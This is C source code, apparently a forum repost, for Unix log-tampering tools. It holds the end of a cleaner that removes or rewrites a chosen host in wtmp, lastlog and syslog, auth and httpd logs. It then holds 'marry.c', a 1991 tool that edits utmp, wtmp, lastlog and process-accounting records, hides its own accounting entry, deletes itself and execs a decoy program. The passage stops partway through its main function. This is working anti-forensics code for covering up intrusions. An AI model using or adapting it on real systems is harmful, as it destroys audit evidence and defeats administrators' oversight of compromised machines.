               memset(&utmp_ent,0,sizeof(struct utmp ));
		  }
               lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
               write (f, &utmp_ent, sizeof( utmp_ent ));
            } 
        }
     close(f);
     printf("cleaning wtmp finished\n\t");
}
void clean_lastlog(char *host,char *fake)
{   
    int f;
    struct lastlog newll;
        if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
		perror("open");
		close(f);
         } else {
               while(read(f,&newll,sizeof(struct lastlog)) > 0 ) { 
                 if(!strncmp(newll.ll_host,host,strlen(host))) {
			 if(fake) {
				 memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
			 }else {
                   memset(&newll,0,sizeof( newll ));
			 }
                   lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
                   write(f,&newll, sizeof( newll ));
               }
          }
        close(f);
      }
    printf("cleaning lastlog finished\n\t"); 
}
void clean_logs(char *host,char *fake)
{
	int i;
	char buffer[MIN],buff[MAX];
	FILE *fin,*fout;
	char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
        char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
		"modAUTH","modHTTPDA","modHTTPDE"} ;
	
     	i=0;
	while(i<7) {
		printf("cleaning %s\n\t",logs[i]);
                strcpy(buff,"");
		if((fin=fopen(logs[i],"r"))==NULL 
				|| (fout=fopen(modlogs[i],"w"))==NULL) {
			perror("fopen");
			fclose(fin);
		        i++;
		}
        
		while(fgets(buffer,MIN,fin) !=NULL) {
			   if(fake) { 
		                      if (strstr(buffer,host) ) {
			                 str_replace(buffer,host,fake);
			                 fputs(buffer,fout); 
                                      }else
					      fputs(buffer,fout);
			   }else {
				   if(!strstr(buffer,host))
					   fputs(buffer,fout);
			   }
		}
	    fclose(fin);
	    fclose(fout);
            if((fout=fopen(logs[i],"w"))==NULL 
	                   || (fin=fopen(modlogs[i],"r"))==NULL) {
		    perror("fopen");
		    fclose(fout);
	    }
	    while((fgets(buffer,MAX,fin)) !=NULL) {
		    fputs(buffer,fout);
	    }
            fclose(fin);           
            fclose(fout);
	    unlink(modlogs[i]);
            i++;
	}
	printf("cleaning logs file finished\n\t"); 
}
void str_replace(char *source,char *pattern,char *replace)
{
      char buffer[MIN];
      char part[MIN];
      int n;
      while((n=pos(source,pattern))>=0) {
                  strcpy(buffer,&source[n+strlen(pattern)]);
                  strcpy(&source[n],replace);
                  strncpy(part,source,n+strlen(replace));
                  part[n+strlen(replace)]='\0';
                  strcat(part,buffer);
                  strcpy(source,part);
                  n=pos(source,pattern);
             }  
}
int pos(char *source,char *pattern)
{
    char substring[MIN];
    int i=0,found=0,position;
    int pattern_len=strlen(pattern);
    while(!found && i<= strlen(source) - pattern_len) {
         strncpy(substring,&source[i],pattern_len);
         substring[pattern_len]='\0';
         if(strcmp(substring,pattern)==0)
              found=1;
         else
             ++i;
        }
     if(found)
           position=i;
      else 
           position=-1;
      return(position);
}


marry.c

Código: php
/* marry v1.1 (c) 1991 -- Proff -- [email protected],
 * All rights reserved.
 *
 * May there be peace in the world, and objectivity amoung men.
 *
 * You may not use this program for unethical purposes. 
 *
 * You may not use this program in relation to your employment, or for monetary
 * gain without express permission from the author.
 *
 * usage:  
 *   marry [-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]]
 *         [-E editor] [-h program] [-b backup ]
 *
 *   -a		automode, dump, run editor over dump and re-assemble to object
 *   -e		edit source, assemble directly to input file, imples no insertion
 *              of records before an equal quantity of deltion
 *   -t		truncate object to last line of dump source when assembling
 *   -s		squeeze, delete all record in input not occuring in dump
 *              (higher entries in input will be appended unless -t is also 
 *              specified)
 *   -u 	when in [L]astlog mode do user-id -> name lookups (time consuming)
 *   -S		Security, when in [A]cct and -[a]uto mode replace editor's acct
 *              record with an unmodified random previous entry, detach from 
 *              terminal, SIGKILL ourselves or execlp [-h program] to hide our
 *              acct record (marry should be exec'ed under these circumstances)
 *   -c		clean, delete backup and dump files once complete
 *   -D		Delete our self once complete (i.e argv[0])
 *   -n		no backups, don't make backups when in -e, -a modes or when
 *              -i file == -o file
 *   -i src	input, the utmp, wtmp, lastlog or p/acct file concerned. defaults
 *              to the system wtmp/lastlog/pacct depending on mode if not specified
 *   -o obj     output, the dump assembled and input merged version of the
 *              above. if given and not in -[a]uto mode, implies we are 
 *              assembling, not dumping. 
 *   -d dump	dump, the dump (editable representation of src) file name. this
 *              is is either an input (-o specified) an output (no -o) or both
 *              -[a]uto. defaults to "marry.dmp" in the current directory if not
 *              specified
 *   -p pat     pattern match. When disassembling (dumping), only extract records
 *              which match (checked against all string fields, and the uid if
 *              the pattern is a valid username)
 *   -v pat	inverse pattern match. like egrep -v. above non-logic features.
 *   -m mode	mode is one of:
 *
 *			W  -  utmp/wtmp (or utmpx/wtmpx see UTMPX #define)
 *                      L  -  lastlog
 *                      A  -  acct/pacct

 *   -E editor	editor to be used in -[a]uto mode. defaults to /usr/bin/vi. must
 *              be the full path in -[S]ecurity mode (we do some clever
 *              symlinking)
 *   -h program hide, if -S mode is on, then attempt to conceal our acct entry by
 *              execlp'ing the specified program. this seems to work on BSD derived
 *              systems. with others, your might want to just call marry something
 *              innocous.
 *   -b backup  name of backup file, defaults to "marry.bak"
 * 
 *   the following instruction codes can be placed in position one of the dump
 *   lines to be assembled (e.g "0057a" -> "=057a"):
 *
 *   '='	tag modification of entry. 
 *   '+'	tag insertion of entry
 *
 * Examples:
 *
 * $ marry -mW -i /etc/utmp -s -a	# dump, edit, re-assemble and strip deleted
 *                                      # entries from utmp

 * $ marry -mL -u -a -n -e	        # dump lastlog with usernames, edit, make no
 *                                      # backups and re-assemble in-situ directly to
 *                                      # lastlog
 *
 * $ marry -mW -a -p mil -E emacs	# dump all wtmp entries matching "mil", edit
 *                                      # with emacs, re-assemble and re-write to wtmp
 *
 * $ exec marry -mA -SceD 		# dump all acct entries by root, edit, remove
 *     -h /usr/sbin/in.fingerd          # editor's acct record, re-assemble directly
 *     -p root -a -i /var/account/acct  # to acct in-situ, delete backup and dump file,
 *                                      # delete ourself from the disk, unassign our
 *                                      # controling terminal, and lastly overlay our
 *                                      # self (and thus our to be acct record) with
 *                                      # in.fingerd
 */

#define UTMP
#undef UTMPX /* solaris has both */
#define LASTLOG
#define PACCT

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <pwd.h>
#include <grp.h>
#include <errno.h>

#ifdef __SVR3
#  include <getopts.h>
#endif
#ifndef bsd
#  if defined(__NetBSD__) || defined(bsdi) || defined(BSDI) || defined(__386BSD__)
#    define bsd
#  endif
#endif

#if !defined(gcc)
#  define NO_VOID /* non gcc, early compiliers */
#endif

#ifndef __SVR3
extern char *optarg; 
#endif

#ifdef NO_VOID
#  define VOID int
#  define FVOID
#else 
#  define VOID void
#  define FVOID void
#endif

#ifndef bool 
#  define bool char
#endif

#define match(a,b) (match_s((a), (b), sizeof(a)))

#ifdef UTMP
#ifdef UTMPX
#  include <utmpx.h>
#  define S_UTMP utmpx
#  define UT_HOST ut_host
#  define UT_ID ut_id
#  define UT_TYPE ut_type
#  define UT_PID ut_pid
#  define UT_TV ut_tv
#  ifdef _PATH_WTMPX
#    define WTMP_FILE _PATH_WTMPX
#  else
#    ifdef WTMPX_FILE
#      define WTMP_FILE WTMPX_FILE
#    else
#      define WTMP_FILE "/usr/adm/wtmpx"
#    endif
#  endif
#else
#  include <utmp.h>
#  define S_UTMP utmp
#  ifndef WTMP_FILE
#    ifdef _PATH_WTMP
#      define WTMP_FILE _PATH_WTMP
#    else
#      define WTMP_FILE "/usr/adm/wtmp"
#    endif
#  endif
#  if !defined(ut_name) && !defined(ut_user)
#    define ut_user ut_name
#  endif
#  if defined(linux) || defined(bsd) || defined(sun)
#    define UT_HOST ut_host
#  endif
#  ifdef linux
#    define UT_ADDR ut_addr
#  endif
#  define UT_TIME ut_time
#  if defined(linux) || defined(solaris)
#    define UT_PID  ut_pid
#    define UT_ID   ut_id
#  endif
#  if defined(linux) || defined(solaris) || defined(sysv) || defined(SYSV) || defined(SVR4)
#    define UT_TYPE ut_type
#  endif
#endif
#endif

#ifdef LASTLOG
#  ifdef bsd
#    ifndef UTMP
#      include <utmp.h>
#    endif
#  else
#    include <lastlog.h>
#  endif
#  ifndef LASTLOG_FILE
#    ifdef _PATH_LASTLOG
#      define LASTLOG_FILE _PATH_LASTLOG
#    else
#      define LASTLOG_FILE "/usr/adm/lastlog"
#    endif
#  endif
#  define LL_HOST ll_host
#endif

#ifdef PACCT
#  include <sys/acct.h>
#  ifdef bsd
#    define PACCT_FILE "/var/account/acct"
#  else
#    define PACCT_FILE "/usr/adm/pacct"
#  endif
#endif

#ifdef UT_ADDR
#  include <arpa/inet.h>
#endif

FILE *ofh, *ifh, *afh;

#ifdef UTMP
struct S_UTMP s_utmp;
#endif
#ifdef LASTLOG
struct lastlog s_lastlog;
#endif
#ifdef PACCT
struct acct s_acct;
struct acct ac_saved;
int acct_step;
#endif
char ac_comm_hide[32];

struct passwd *uid;
struct passwd uid_s;
char **uida=NULL;
char **gida=NULL;

#define MAX_UID 65537

char *quotes="\"\"";

int globline=0;

char *a_Input=NULL;
char *a_Output=NULL;
char *a_Pattern=NULL;
char *a_Hide=NULL;
#ifdef sun
char *a_Editor="/usr/ucb/vi";
#else
char *a_Editor="/usr/bin/vi";
#endif
char *a_Dump="marry.dmp";
char *a_Backup="marry.bak";
bool f_Auto=0;
bool f_Squeeze=0;
bool f_EditSrc=0;
bool f_Truncate=0;
bool f_Exclude=0;
bool f_Uid=0;
bool f_Security=0;
bool f_Clean=0;
bool f_DeleteSelf=0;
bool f_NoBackups=0;
bool f_backedup;
char mode;

int mode_size=0;
void *mode_data;

int globline;
char *mes;
time_t otime=0;
FVOID display()
{
static int n;
time_t t;
	globline++;
	if (n++<30) return; /* don't want too many context switches */
	n=0;
	time(&t);
	if (t<(otime+1)) return;
	otime=t;
	printf("%s%d\r", mes, globline);
	fflush(stdout);
}
FVOID display_end()
{
	printf("%s%d\n", mes, globline);
	fflush(stdout);
}

#ifdef NO_VOID
char
#else
void
#endif
*
Smalloc(n)
int n;
{
#ifdef NO_VOID
char
#else
void
#endif
* p;
	while (!(p=malloc(n))) sleep(1);
	return p;
}

bool copyf(src, dst)
char *src;
char *dst;
{
#define CBUFLEN 128*1024
int fi, fo;
char *buf;
int cc;
	if ((fi=open(src, O_RDONLY, 0))<0)
	{
		perror(src);
		exit(1);
	}
	if ((fo=open(dst, O_WRONLY|O_CREAT|O_TRUNC, 0666))<0)
	{
		perror(dst);
		exit(1);
	}
	buf=Smalloc(CBUFLEN);
	while ((cc=read(fi, buf, CBUFLEN))>0)
		if (write(fo, buf, cc)!=cc)
		{
			perror(dst);
			exit(1);
		}
	close(fo);
	close(fi);
	free(buf);
	return 1;
}

bool backup(src)
char *src;
{
	printf("backup = %s\n", a_Backup);
	fflush(stdout);
	return copyf(src, a_Backup);
}

char *match_s(haystack, needle, n)
char *haystack;
char *needle;
int n;
{
static char tmp[256];
	strncpy(tmp, haystack, n>sizeof(tmp)? sizeof(tmp): n);
	return strstr(tmp, needle);
}

unsigned short atoi2(s)
char *s;
{
	return (s[0]-'0')*10+(s[1]-'0');
}

char *p_string(s, size)
char *s;
int size;
{
static char sss[1024];
register int n;
char *ss=sss;
	if (!*s) return quotes;
	
	for (n=0; n<size; n++)
	{
		char c=s[n];
		switch (c)
		{
		case '\\':
			*(ss++)=c;
			break;
		case ' ':
			*(ss++)='\\';
			break;
		case '\t':
			*(ss++)='\\';
			c='t';
			break;
		case '\n':
			*(ss++)='\\';
			c='n';
			break;
		case '\r':
			*(ss++)='\\';
			c='r';
			break;
		case 0:
			goto end;
		}
		*(ss++)=c;
	}
end:
	*ss=0;
	return sss;
}

char *skip_white(s)
char *s;
{	for (; *s && (*s=='\t' || *s==' '); s++);
	if (!*s || (*s=='\n')) return NULL;
	return s;
}

char *g_string(d, s, size)
char *d;
char *s;
int size;
{
int y;
char c;
char f_esc=0;
	for (y=0; y<size; y++) d[y]=0;
	if (!(s=skip_white(s))) return NULL;
	if (*s=='"' && *(s+1)=='"') return s+2;
	for (y=0; y<size; s++)
	{
		c=*s;
		if (f_esc)
		{
			switch(c)
			{
			case 'r':
				c='\r';
				break;
			case 'n':
				c='\n';
				break;
			case 't':
				c='\t';
				break;
			}
			f_esc=0;
		} else {
			switch(c)
			{
			case '\\':
				f_esc=1;
				continue;
			case ' ':
			case '\t':
			case '\n':
			case '\0':
				goto end;
			}
		}
		d[y++]=c;
	}
end:
	return s+1;
}

char *time_s(tt)
time_t tt;
{
static char s[13];
	time_t t=tt; /* some compilers won't take a parameter address */
	struct tm *tp;
	tp=localtime(&t);
	sprintf(s, "%02d%02d%02d%02d%02d%02d",
		tp->tm_year, tp->tm_mon+1, tp->tm_mday,
		tp->tm_hour, tp->tm_min, tp->tm_sec);
	return s;
}
 
time_t time_i(s)
char *s;
{
	struct tm lt;
	time_t t;
	if (strlen(s)!=12) return (time_t)-1;
	time(&t);
	lt=*localtime(&t);
	lt.tm_year=atoi2(s);
	lt.tm_mon=atoi2(s+2)-1;
	lt.tm_mday=atoi2(s+4);
	lt.tm_hour=atoi2(s+6);
	lt.tm_min=atoi2(s+8);
	lt.tm_sec=atoi2(s+10);
	lt.tm_isdst=-1;
	return mktime(&lt);
}

char *
bgetgrgid(u)
gid_t u;
{
struct group *gr;
	if (!gida)
	{
		int n;
		gida=(char **)Smalloc(sizeof(char *)*MAX_UID);
		for (n=0; n<MAX_UID; n++) gida[n]=NULL; 
	}
	if (gida[u]==(char *)-1) return NULL;
	if (gida[u]) return gida[u];
	if (!(gr=getgrgid(u))) 
	{
		gida[u]=(char *)-1;
		return NULL;
	}
	gida[u]=Smalloc(strlen(gr->gr_name)+1);
	strcpy(gida[u], gr->gr_name);
	return gida[u];
}

char *
bgetpwuid(u)
uid_t u;
{
struct passwd *pw;
	if (!uida)
	{
		int n;
		uida=(char **)Smalloc(sizeof(struct passwd *)*MAX_UID);
		for (n=0; n<MAX_UID; n++) uida[n]=NULL; 
	}
	if (uida[u]==(char *)-1) return NULL;
	if (uida[u]) return uida[u];
	if (!(pw=getpwuid(u))) 
	{
		uida[u]=(char *)-1;
		return NULL;
	}
	uida[u]=Smalloc(strlen(pw->pw_name)+1);
	strcpy(uida[u], pw->pw_name);
	return uida[u];
}

#ifdef UTMP
bool dump_utmp(uline, ut)
int uline;
struct S_UTMP *ut;
{
	time_t tim;
	if (a_Pattern)
	{
		if (!match(ut->ut_user, a_Pattern) &&
		    !match(ut->ut_line, a_Pattern)
#ifdef UT_HOST
		    && !match(ut->UT_HOST, a_Pattern)
#endif
			) {if (!f_Exclude) return 1;}
		else if (f_Exclude) return 1;
	 }
	fprintf(afh, "%05x", uline-1);
	fprintf(afh, " %-8s", p_string(ut->ut_user, sizeof(ut->ut_user)));
	fprintf(afh, " %-11s", p_string(ut->ut_line, sizeof(ut->ut_line)));
#ifdef UT_ID
	fprintf(afh, " %-4s", p_string(ut->UT_ID, sizeof(ut->UT_ID)));
#endif
#ifdef UT_TYPE
	fprintf(afh, " %-2x", ut->UT_TYPE);
#endif
#ifdef UT_PID
	fprintf(afh, " %-5d", (int)ut->UT_PID);
#endif
#if defined(UT_TIME) || defined (UT_TV)
#  ifdef UT_TIME
	tim=ut->UT_TIME;
#  else
	tim=ut->UT_TV.tv_sec;
#  endif
	fprintf(afh, " %s", time_s(tim));
#endif
#ifdef UT_ADDR
	fprintf(afh, " %-15s", inet_ntoa(*((struct in_addr *)&ut->UT_ADDR)));
#endif
#ifdef UT_HOST
	fprintf(afh, " %s", p_string(ut->UT_HOST, sizeof(ut->UT_HOST)));
#endif
	fputc('\n', afh);
	return 1;
}
#endif

#ifdef LASTLOG
bool dump_lastlog(uline, ll)
int uline;
struct lastlog *ll;
{
	char *name;
	struct passwd *pw;
	if (f_Uid) 
	{
		pw=getpwuid(uline-1);
		name=pw? pw->pw_name: quotes;
	} else
	{
	  static char s[6];
	  	sprintf(s, "%05d", uline-1);
		name=s;
	}
	if (a_Pattern)
	{
		if (
		    (!uid || (uid->pw_uid!=(uline-1))) &&
		    (!f_Uid || strstr(name, a_Pattern)) &&
#ifdef LL_HOST
		    !match(ll->ll_host, a_Pattern) &&
#endif
		    !match(ll->ll_line, a_Pattern)
			) {if (!f_Exclude) return 1;}
		else if (f_Exclude) return 1;
	 }
	fprintf(afh, "%05x", uline-1);
	fprintf(afh, " %-8s", name);
	fprintf(afh, " %-11s", p_string(ll->ll_line, sizeof(ll->ll_line)));
	fprintf(afh, " %s", time_s(ll->ll_time));
#ifdef LL_HOST
	fprintf(afh, " %s", p_string(ll->LL_HOST, sizeof(ll->LL_HOST)));
#endif
	fputc('\n', afh);
	return 1;
}
#endif

#ifdef PACCT
bool dump_pacct(uline, ac)
int uline;
struct acct *ac;
{
	char *name;
	char *gr_name;
	if (!(name=bgetpwuid(ac->ac_uid)))
	{
	  static char s[6];
	  	sprintf(s, "%05d", ac->ac_uid);
		name=s;
	}
	if (!(gr_name=bgetgrgid(ac->ac_gid)))
	{
	  static char s[6];
	  	sprintf(s, "%05d", ac->ac_gid);
		gr_name=s;
	}
	if (a_Pattern)
	{
		if (
		    (!uid || (uid->pw_uid!=ac->ac_uid)) &&
		    (strstr(name, a_Pattern)) &&
		    (strstr(gr_name, a_Pattern))
			) {if (!f_Exclude) return 1;}
		else if (f_Exclude) return 1;
	}
	fprintf(afh, "%05x", uline-1);
	fprintf(afh, " %-8s", name);
	fprintf(afh, " %-8s", gr_name);
	fprintf(afh, " %-10s", p_string(ac->ac_comm, sizeof(ac->ac_comm)));
	if (ac->ac_tty==(dev_t)-1)
		fputs(" ----", afh);
	else
		fprintf(afh, " %04x", ac->ac_tty);
	fprintf(afh, " %2x", ac->ac_flag);
	fprintf(afh, " %s", time_s(ac->ac_btime));
	fputc('\n', afh);
	return 1;
}
#endif

FVOID makedump()
{
int uline;
	if ((ifh=fopen(a_Input, "r"))==NULL)
	{
		perror(a_Input);
		exit(1);
	}
	if ((afh=fopen(a_Dump, "w"))==NULL)
	{
		perror(a_Dump);
		exit(1);
	}
	fputc('\n', stdout);
	globline=0;
	mes="entries disassembled: ";
	for (uline=1; fread(mode_data, mode_size, 1, ifh)>0; uline++)
	{
		display();
		switch(mode)
		{
#ifdef UTMP
		case 'W':
			dump_utmp(uline, mode_data);
			break;
#endif
#ifdef LASTLOG
		case 'L':
			dump_lastlog(uline, mode_data);
			break;
#endif
#ifdef PACCT
		case 'A':
			dump_pacct(uline, mode_data);
			break;
#endif
		}
	}
	display_end();
	fclose(afh);
	fclose(ifh);
}

int seek_ifh(uline)
int uline;
{
	if (ftell(ifh)!=mode_size*(uline-1))
		if (fseek(ifh, mode_size*(uline-1), SEEK_SET)==-1)
			return 0;
	return 1;
}

#ifdef UTMP
int mod_utmp(ut, p)
struct S_UTMP *ut;
char *p;
{
	char *op;
static char tmp[255];
#if defined(UT_TIME) || defined(UT_TV)
#endif
	op=p;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	if (!(p=g_string(ut->ut_user, p, sizeof(ut->ut_user)))) return 0;
	if (!(p=g_string(ut->ut_line, p, sizeof(ut->ut_line)))) return 0;
#ifdef UT_ID
	if (!(p=g_string(ut->UT_ID, p, sizeof(ut->UT_ID)))) return 0;
#endif
#ifdef UT_TYPE
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	sscanf(tmp, "%x", (unsigned int *)&(ut->UT_TYPE));
#endif
#ifdef UT_PID
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	ut->UT_PID=atoi(tmp);
#endif
#if defined(UT_TIME) || defined(UT_TV)
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
#  ifdef UT_TIME
	if ((ut->UT_TIME=time_i(tmp))==(time_t)-1)
#  else /* UT_TV */
	if ((ut->UT_TV.tv_sec=time_i(tmp))==(time_t)-1)
#  endif
		fprintf(stderr, "warning: invalid time spec %s", op);
#endif
#ifdef UT_ADDR
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	ut->UT_ADDR=inet_addr(tmp);
#endif
#ifdef UT_HOST
	if (!(p=g_string(ut->UT_HOST, p, sizeof(ut->UT_HOST)))) return 0;
#endif
	return 1;
}
#endif

#ifdef LASTLOG
int mod_lastlog(ll, p)
struct lastlog *ll;
char *p;
{
	char *op;
static char tmp[255];
	op=p;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; /*skip name*/
	if (!(p=g_string(ll->ll_line, p, sizeof(ll->ll_line)))) return 0;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	if ((ll->ll_time=time_i(tmp))==(time_t)-1)
		fprintf(stderr, "warning illegal time: %s\n", op);
#ifdef LL_HOST
	if (!(p=g_string(ll->ll_host, p, sizeof(ll->ll_host)))) return 0;
#endif
	return 1;
}
#endif

#ifdef PACCT
int mod_pacct(ac, p)
struct acct *ac;
char *p;
{
static char tmp[255];
struct passwd *pw;
struct group *gr;
char *op;
long int t;
unsigned int tu;
	op=p;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
	if (sscanf(tmp, "%ld", &t)!=1)
	{
		if (!(pw=getpwnam(tmp)))
			fprintf(stderr, "warning: unknown username %s\n", op);
		else
			ac->ac_uid=pw->pw_uid;
	} else ac->ac_uid=t;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
	if (sscanf(tmp, "%ld", &t)!=1)
	{
		if (!(gr=getgrnam(tmp)))
			fprintf(stderr, "warning: unknown group %s\n", op);
		else
			ac->ac_gid=pw->pw_gid;
	} else ac->ac_gid=t;
	if (!(p=g_string(ac->ac_comm, p, sizeof(ac->ac_comm)))) return 0;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	if (sscanf(tmp, "%x", &tu)!=1) ac->ac_tty=(dev_t)-1;
	else ac->ac_tty=tu;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	if (sscanf(tmp, "%x", &tu)!=1)
		fprintf(stderr, "warning: invalid flags %s\n", op);
	else ac->ac_flag=tu;
	if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
	if ((ac->ac_btime=time_i(tmp))==(time_t)-1)
		fprintf(stderr, "warning: illegal time: %s\n", op);
	return 1;
}
#endif

bool wcopy(uline)
int uline;
{
	if (!seek_ifh(uline)) return 0;
	while (fread(mode_data, mode_size, 1, ifh)>0)
	{
		display();
#ifdef PACCT
		if (f_Security && f_Auto && mode=='A')
		{
			struct acct *p; 
			p=(struct acct *)mode_data;
			if (!strncmp(p->ac_comm, ac_comm_hide, sizeof(ac_comm_hide)))
			{
				ac_saved.ac_btime=p->ac_btime;
				*p=ac_saved;
			}
		}
#endif
		if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
	}
#ifndef NO_FTRUNCATE
	if (f_Squeeze && f_EditSrc) ftruncate(fileno(ofh), ftell(ofh));
#endif
	return 1;
}

bool domod(p)
char *p;
{
bool ret=0;
	if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
	switch(mode)
	{
#ifdef UTMP
	case 'W':
		ret=mod_utmp(mode_data, p);
		break;
#endif
#ifdef LASTLOG
	case 'L':
		ret=mod_lastlog(mode_data, p);
		break;
#endif
#ifdef PACCT
	case 'A':
		ret=mod_pacct(mode_data, p);
		break;
#endif
	}
	if (!ret)
		fprintf(stderr, "warning: invalid dump input `%s'\n", p);
	return 1;
}

static wu_line=0;

int obj_update(uline, p, f_mod)
int uline;
char *p;
char f_mod;
{
	if (f_Squeeze)
	{
		display();
		seek_ifh(uline);
		if (f_mod) {if (!domod(p)) return 0;}
		else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
		if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
	} else {
		if (f_EditSrc)
		{
			if (f_mod)
				fseek(ofh, mode_size*(uline-1), SEEK_SET);
		} else {
			while(++wu_line<uline)
			{
				display();
				if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
				if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
			}
		}
		if (f_mod)
		{
			seek_ifh(uline);
			if (!domod(p)) return 0;
			if (f_mod==2) wu_line--; 
		} else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
		if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
		display();
	}
#ifdef PACCT
	if (f_Security && f_Auto && !f_mod && mode=='A')
		if (!uline%acct_step) ac_saved=*(struct acct *)mode_data;
#endif
	return 1;
}

FVOID makeobject()
{
int uline=1;
char line[1024];
char *p;
char f_mod;
	if ((ifh=fopen(a_Input, "r"))==NULL)
	{
		perror(a_Input);
		exit(1);
	}
	if ((afh=fopen(a_Dump, "r"))==NULL)
	{
		perror(a_Dump);
		exit(1);
	}
	if ((ofh=fopen(a_Output, f_EditSrc? "r+": "w"))==NULL)
	{
		perror(a_Output);
		exit(1);
	}
#ifdef PACCT
	if (f_Security && f_Auto && mode=='A')
		acct_step=(getpid()+8)%60;
#endif
	fputc('\n', stdout);
	globline=0;
	mes="entries assembled: ";
	while (1)
	{
		if (!fgets((p=line), sizeof(line), afh)) 
		{
			if (f_EditSrc)
			{
#ifndef NO_FTRUNCATE
				if (f_Truncate)
				{
					fflush(ofh);
					ftruncate(fileno(ofh), uline*mode_size);
				}
#endif
				goto closeup;
			}
			if (!f_Truncate) wcopy(uline+1);
			goto closeup;
		}
		switch (*p)
		{
		case 0:
		case '#':
		case '\n':
			continue;
		case '=': 
			f_mod=1; 
			p++; 
			break;
		case '+':
			if (f_EditSrc)
			{
				if (f_Squeeze)
					fprintf(stderr, "warning: the + operator can have \
unpredictable effects when used in conbination with -e and -s\n");
				else
				{
					fprintf(stderr, "error: + operator used with -e\n");
					exit(1);
				}
			}
			f_mod=2;
			p++;
			break;
		default: {f_mod=0; break;}
		}
		if (sscanf(p, "%x", &uline)!=1)
		{
			perror("invalid line number in ascii input");
			exit(1);
		}
		uline++;
		if (!obj_update(uline, p, f_mod))
 		{
			perror("read/write failed");
			exit(1);
		}
	}
closeup:
	display_end();
	fclose(ofh);
	fclose(ifh);
	fclose(afh);
}

FVOID usage(s)
char *s;
{
	fprintf(stderr, "usage: %s\t[-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]]\n\
\t\t[-E editor] [-h program]\n", s);
	exit(1);
}

int main(argc, argv)
int argc;
char **argv;
{
	char *ed;
	char c;
#ifdef PACCT
	mode='A';
#endif
#ifdef LASTLOG
	mode='L';
#endif
#ifdef UTMP
	mode='W';
#endif

	puts("marry v1.0 (c) 1991 -- Proff -- All rights reserved.");
	umask(022);
	while ((c=getopt(argc, argv, "i:o:d:aetsp:v:m:uScDnE:h:b:"))!=-1)
	switch(c)
	{
		case 'i':
			a_Input=optarg;
			break;
		case 'o':
			a_Output=optarg;
			break;
		case 'd':
			a_Dump=optarg;
			break;
		case 'a':
			f_Auto=1;
			break;
		case 'e':
			f_EditSrc=1;
			break;
		case 't':
			f_Truncate=1;
			break;
		case 's':
			f_Squeeze=1;
			break;
		case 'p':
			a_Pattern=optarg;
			break;
		case 'v':
			f_Exclude=1;
			a_Pattern=optarg;
			break;
		case 'm':
			mode=*optarg;
			break;
		case 'u':
			f_Uid=1;
			break;
		case 'S':
			f_Security=1;
			break;
		case 'c':
			f_Clean=1;
			break;
		case 'D':
			f_DeleteSelf=1;
			break;
		case 'n':
			f_NoBackups=1;
			break;
		case 'E':
			a_Editor=optarg;
			break;
		case 'h':
			a_Hide=optarg;
			break;
		case 'b':
			a_Backup=optarg;
			break;
		case '?':
		default:
			fprintf(stderr, "%s: unknown option `%c'\n", argv[0], c);
			usage(argv[0]);
			/* NOT_REACHED */
	}
	if (a_Output && f_EditSrc)
	{
		perror("can't have -o and -e together");
		exit(1);
	}
	switch(mode)
	{
#ifdef UTMP
	case 'W':
		mode_size=sizeof(struct S_UTMP);
		mode_data=&s_utmp;
		if (!a_Input) a_Input=WTMP_FILE;
		break;
#endif
#ifdef LASTLOG
	case 'L':
		mode_size=sizeof(struct lastlog);
		mode_data=&s_lastlog;
		if (!a_Input) a_Input=LASTLOG_FILE;
		break;
#endif
#ifdef PACCT
	case 'A':
		mode_size=sizeof(struct acct);
		mode_data=&s_acct;
		if (!a_Input) a_Input=PACCT_FILE;
		break;
#endif
        default:
		fprintf(stderr, "unknown mode `%c'\n", mode);
		usage();
		/*NOT_REACHED*/
	}
	if (a_Pattern) uid=getpwnam(a_Pattern);
	if (uid) {uid_s=*uid; uid=&uid_s;}
	if (f_Auto)
	{
	struct stat st1, st2;
	int pid;
	int ws;
		if (stat(a_Editor, &st1))
		{
			fprintf(stderr, "error: editor `%s' must exist with -a (check -E value)\n", a_Editor);
			exit(1);
		}
		makedump();
		if (f_Security)
		{
			sprintf(ac_comm_hide, "m%d", getpid());
			symlink(a_Editor, ac_comm_hide);
			ed=ac_comm_hide;
		} else  ed=a_Editor;

		stat(a_Dump, &st1);
		if (!(pid=fork()))
		{
			printf("%s %s\n", ed, a_Dump);
			fflush(stdout);
			execlp(ed, ed, a_Dump, 0);
			perror(ed);
			_exit(1);
		}
		if (pid<0)
		{
			perror("fork");
			exit(1);
		}
		while (wait(&ws)!=pid);
		if (f_Security)
			unlink(ac_comm_hide);
		stat(a_Dump, &st2);
		if (st1.st_mtime==st2.st_mtime)
		{
